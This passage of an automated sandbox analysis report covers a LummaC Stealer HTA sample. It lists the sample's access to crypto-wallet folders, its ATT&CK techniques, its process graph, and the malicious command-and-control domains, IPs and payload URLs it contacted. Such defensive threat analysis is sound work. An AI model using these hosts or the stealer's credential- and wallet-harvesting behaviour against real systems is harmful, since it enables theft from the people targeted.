                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior

                              Remote Access Functionality

                              barindex
                              Yara detected LummaC Stealer
                              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6096, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                              Windows Management Instrumentation                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		21
                              Deobfuscate/Decode Files or Information                              		2
                              OS Credential Dumping                              		11
                              File and Directory Discovery                              		Remote Services1
                              Archive Collected Data                              		3
                              Ingress Tool Transfer                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts2
                              Command and Scripting Interpreter                              		Boot or Logon Initialization Scripts11
                              Process Injection                              		3
                              Obfuscated Files or Information                              		LSASS Memory23
                              System Information Discovery                              		Remote Desktop Protocol41
                              Data from Local System                              		11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts4
                              PowerShell                              		Logon Script (Windows)Logon Script (Windows)1
                              Software Packing                              		Security Account Manager221
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Screen Capture                              		4
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                              DLL Side-Loading                              		NTDS1
                              Process Discovery                              		Distributed Component Object Model1
                              Email Collection                              		115
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Masquerading                              		LSA Secrets221
                              Virtualization/Sandbox Evasion                              		SSH2
                              Clipboard Data                              		Fallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
                              Virtualization/Sandbox Evasion                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                              Process Injection                              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592081 Sample: new-riii-1-b.pub.hta Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 26 idealizetreez.shop 2->26 28 e1.foiloverturnarrival.shop 2->28 30 2 other IPs or domains 2->30 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 14 other signatures 2->44 9 mshta.exe 1 2->9         started        signatures3 process4 signatures5 54 Encrypted powershell cmdline option found 9->54 12 powershell.exe 17 9->12         started        process6 signatures7 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->56 58 Suspicious powershell command line found 12->58 60 Creates HTML files with .exe extension (expired dropper behavior) 12->60 62 3 other signatures 12->62 15 powershell.exe 15 16 12->15         started        18 conhost.exe 12->18         started        process8 dnsIp9 36 f1.foiloverturnarrival.shop 172.67.194.161, 443, 49715, 57600 CLOUDFLARENETUS United States 15->36 20 powershell.exe 1 15->20         started        24 conhost.exe 15->24         started        process10 dnsIp11 32 idealizetreez.shop 104.21.64.1, 443, 57621, 57628 CLOUDFLARENETUS United States 20->32 34 klipgibob.shop 172.67.212.45, 443, 57702 CLOUDFLARENETUS United States 20->34 46 Query firmware table information (likely to detect VMs) 20->46 48 Found many strings related to Crypto-Wallets (likely being stolen) 20->48 50 Tries to harvest and steal ftp login credentials 20->50 52 2 other signatures 20->52 signatures12

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              new-riii-1-b.pub.hta5%VirustotalBrowse
                              new-riii-1-b.pub.hta3%ReversingLabs

                              Dropped Files

                              No Antivirus matches

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              jarry-deatile.bond0%Avira URL Cloudsafe
                              https://idealizetreez.shop:443/api.default-release/key4.dbPK0%Avira URL Cloudsafe
                              http://www.smartassembly.com/webservices/Reporting/UploadReport20%Avira URL Cloudsafe
                              immolatechallen.bond0%Avira URL Cloudsafe
                              https://klipgibob.shop/0%Avira URL Cloudsafe
                              https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf0%Avira URL Cloudsafe
                              http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL0%Avira URL Cloudsafe
                              http://www.smartassembly.com/webservices/Reporting/0%Avira URL Cloudsafe
                              https://e1.foilovMicrosoft.PowerShell.Utility.psd10%Avira URL Cloudsafe
                              https://klipgibob.shop/int_clp_8888.txt0%Avira URL Cloudsafe
                              https://idealizetreez.shop:443/api0%Avira URL Cloudsafe
                              https://e1.foilovM0%Avira URL Cloudsafe
                              https://f1.foiloverturnarrival.shop/riiw1.mp30%Avira URL Cloudsafe
                              idealizetreez.shop0%Avira URL Cloudsafe
                              https://idealizetreez.shop/0%Avira URL Cloudsafe
                              pain-temper.bond0%Avira URL Cloudsafe
                              growthselec.bond0%Avira URL Cloudsafe
                              https://klipgibob.shop/R0%Avira URL Cloudsafe
                              https://idealizetreez.shop/&0%Avira URL Cloudsafe
                              https://klipgibob.shop/d0%Avira URL Cloudsafe
                              https://idealizetreez.shop/api0%Avira URL Cloudsafe
                              stripedre-lot.bond0%Avira URL Cloudsafe
                              crookedfoshe.bond0%Avira URL Cloudsafe
                              http://www.smartassembly.com/webservices/Reporting/UploadReport2v0%Avira URL Cloudsafe
                              jarry-fixxer.bond0%Avira URL Cloudsafe
                              http://www.smartassembly.com/webservices/UploadReportLogin/0%Avira URL Cloudsafe
                              https://klipgibob.shop:443/int_clp_8888.txtt0%Avira URL Cloudsafe
                              https://e1.foiloverturnarrival.shop0%Avira URL Cloudsafe
                              https://idealizetreez.shop/apiP0%Avira URL Cloudsafe
                              strivehelpeu.bond0%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              e1.foiloverturnarrival.shop
                              		172.67.194.161
                              		truetrue
                                		unknown
                                f1.foiloverturnarrival.shop
                                		172.67.194.161
                                		truefalse
                                  		unknown
                                  idealizetreez.shop
                                  		104.21.64.1
                                  		truetrue
                                    		unknown
                                    klipgibob.shop
                                    		172.67.212.45
                                    		truefalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      jarry-deatile.bondtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://e1.foiloverturnarrival.shop/5c85i3vbf.vdftrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      immolatechallen.bondtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://klipgibob.shop/int_clp_8888.txtfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      idealizetreez.shoptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://f1.foiloverturnarrival.shop/riiw1.mp3false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      pain-temper.bondtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      growthselec.bondtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://idealizetreez.shop/apitrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      stripedre-lot.bondtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      jarry-fixxer.bondtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      crookedfoshe.bondtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      strivehelpeu.bondtrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://idealizetreez.shop:443/api.default-release/key4.dbPKpowershell.exe, 0000000A.00000002.2615868252.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/mgravell/protobuf-netJpowershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                          		high
                                          http://ocsp.sectigo.com0powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://www.smartassembly.com/webservices/Reporting/UploadReport2powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.2473160112.00000000060E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_mepowershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                		high
                                                http://www.smartassembly.com/webservices/Reporting/powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURLpowershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://klipgibob.shop/powershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.com/mgravell/protobuf-netipowershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2166214254.0000000005401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473160112.0000000005081000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/powershell.exe, 00000004.00000002.2473160112.00000000060E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2169498236.0000000006467000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473160112.00000000060E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://e1.foilovMicrosoft.PowerShell.Utility.psd1powershell.exe, 00000002.00000002.2170945557.0000000007A9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://developers.cloudflare.com/r2/data-access/public-buckets/powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2614706599.0000000004E6D000.00000004.00000800.00020000.00000000.sdmp, UAGVQ199I7H3ZT4G1PSFXCX6W.exe.10.drfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2166214254.0000000005401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473160112.0000000005081000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://e1.foilovMpowershell.exe, 00000002.00000002.2170945557.0000000007A9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://idealizetreez.shop/powershell.exe, 0000000A.00000002.2615620386.0000000004EF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2169498236.0000000006467000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2473160112.00000000060E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://sectigo.com/CPS0powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://stackoverflow.com/q/14436606/23354powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2473160112.00000000051D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2473160112.00000000051D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://idealizetreez.shop:443/apipowershell.exe, 0000000A.00000002.2615868252.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://idealizetreez.shop/&powershell.exe, 0000000A.00000002.2614421202.0000000004E60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://klipgibob.shop/Rpowershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://contoso.com/Iconpowershell.exe, 00000004.00000002.2473160112.00000000060E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/mgravell/protobuf-netpowershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://klipgibob.shop/dpowershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2473160112.00000000051D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.smartassembly.com/webservices/Reporting/UploadReport2vpowershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://stackoverflow.com/q/2152978/23354powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.cloudflare.com/favicon.icopowershell.exe, 0000000A.00000002.2612459672.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2614706599.0000000004E6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2612459672.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2615868252.0000000004F0F000.00000004.00000800.00020000.00000000.sdmp, UAGVQ199I7H3ZT4G1PSFXCX6W.exe.10.drfalse
                                                                                        		high
                                                                                        http://www.smartassembly.com/webservices/UploadReportLogin/powershell.exe, 00000004.00000002.2833938685.000000000EBB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://klipgibob.shop:443/int_clp_8888.txttpowershell.exe, 0000000A.00000002.2615868252.0000000004F0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://e1.foiloverturnarrival.shoppowershell.exe, 00000004.00000002.2473160112.00000000051D6000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://idealizetreez.shop/apiPpowershell.exe, 0000000A.00000002.2612459672.0000000002A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        172.67.212.45
                                                                                        		klipgibob.shopUnited States
                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                        104.21.64.1
                                                                                        		idealizetreez.shopUnited States
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        172.67.194.161
                                                                                        		e1.foiloverturnarrival.shopUnited States
                                                                                        		13335CLOUDFLARENETUStrue

                                                                                        General Information

                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1592081
                                                                                        Start date and time:2025-01-15 18:24:10 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 5s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:11
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:new-riii-1-b.pub.hta
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winHTA@10/7@4/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 66.7%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 92%
                                                                                        • Number of executed functions: 123
                                                                                        • Number of non-executed functions: 92
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .hta

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 52.149.20.212
                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 1600 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        12:25:05API Interceptor79x Sleep call for process: powershell.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        104.21.64.1NVIDIAShare.exe.bin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.php
                                                                                        gem2.exeGet hashmaliciousUnknownBrowse
                                                                                        • securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                                                        SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.mffnow.info/0pqe/
                                                                                        4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.vilakodsiy.sbs/w7eo/
                                                                                        1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.mzkd6gp5.top/utww/
                                                                                        QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.mzkd6gp5.top/3u0p/
                                                                                        Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                        • ordrr.statementquo.com/QCbxA/
                                                                                        SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                        • adsfirm.com/administrator/index.php
                                                                                        PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.bser101pp.buzz/v89f/
                                                                                        172.67.194.161https://www.linkedin.com/slink?code=gBGmJGFB#aGFycmlmb3JkQHJzbS5ubA==Get hashmaliciousHTMLPhisherBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CLOUDFLARENETUSPO -2025918.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                          • 188.114.97.3
                                                                                          EZsrFTi.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                          • 104.21.64.1
                                                                                          random.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                          • 104.21.21.16
                                                                                          NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.79.87
                                                                                          DOCU800147001.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 104.21.32.1
                                                                                          firstontario.docxGet hashmaliciousUnknownBrowse
                                                                                          • 1.1.1.1
                                                                                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.67.165
                                                                                          https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082Get hashmaliciousUnknownBrowse
                                                                                          • 104.21.78.33
                                                                                          CLOUDFLARENETUSPO -2025918.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                          • 188.114.97.3
                                                                                          EZsrFTi.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                          • 104.21.64.1
                                                                                          random.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                          • 104.21.21.16
                                                                                          NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.79.87
                                                                                          DOCU800147001.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 104.21.32.1
                                                                                          firstontario.docxGet hashmaliciousUnknownBrowse
                                                                                          • 1.1.1.1
                                                                                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.67.165
                                                                                          https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082Get hashmaliciousUnknownBrowse
                                                                                          • 104.21.78.33
                                                                                          CLOUDFLARENETUSPO -2025918.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                          • 188.114.97.3
                                                                                          EZsrFTi.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                          • 104.21.64.1
                                                                                          random.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                          • 104.21.21.16
                                                                                          NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.79.87
                                                                                          DOCU800147001.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 104.21.32.1
                                                                                          firstontario.docxGet hashmaliciousUnknownBrowse
                                                                                          • 1.1.1.1
                                                                                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.67.165
                                                                                          https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082Get hashmaliciousUnknownBrowse
                                                                                          • 104.21.78.33

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          3b5074b1b5d032e5620f69f9f700ff0ehttps://login.ecoleterradeasltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725581254870614.NzQzNDkzODMtOTc3Ni00MTk4LWEyOTgtNzcxOTE2NjUxYzRiMGVmZDU5N2MtN2U3NC00YjUwLTkxMzUtNTE5MGUwYzg1ZmQ2&ui_locales=en-US&mkt=en-US&client-request-id=36d4a1f6-7cba-45d1-a3ed-df92000d1eff&state=HfQ7BQGkYjqSuhdp0uw1pmK7OnWuMWuL6CrtRUQFTAqayUvi4HK2WHpRg3qXyBpviEzEkkPrHxRuxUPhbVJ6VT_z1Q4rknsdO1I1G8I0vvmCJKY1Jj17UvvXfl7rwwbByhZiSjZv4e0zjm8vBEwSjLmzdF29N_NteyY8M7drEpkBEAgCB0EoFXswqlG9707goDIQqjTpA0BHvdohyO5aj-tJFO1J-Wz2owkKr6bkCNZlxKE53oI2XKYpyD1GEC2x5jHgmT1f4Yrr9BPkhEeMCw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Get hashmaliciousUnknownBrowse
                                                                                          • 172.67.194.161
                                                                                          random.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                          • 172.67.194.161
                                                                                          f5mfkHLLVe.dllGet hashmaliciousWannacryBrowse
                                                                                          • 172.67.194.161
                                                                                          hNgIvHRuTU.dllGet hashmaliciousWannacryBrowse
                                                                                          • 172.67.194.161
                                                                                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.194.161
                                                                                          2lX8Z3eydC.dllGet hashmaliciousWannacryBrowse
                                                                                          • 172.67.194.161
                                                                                          aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.194.161
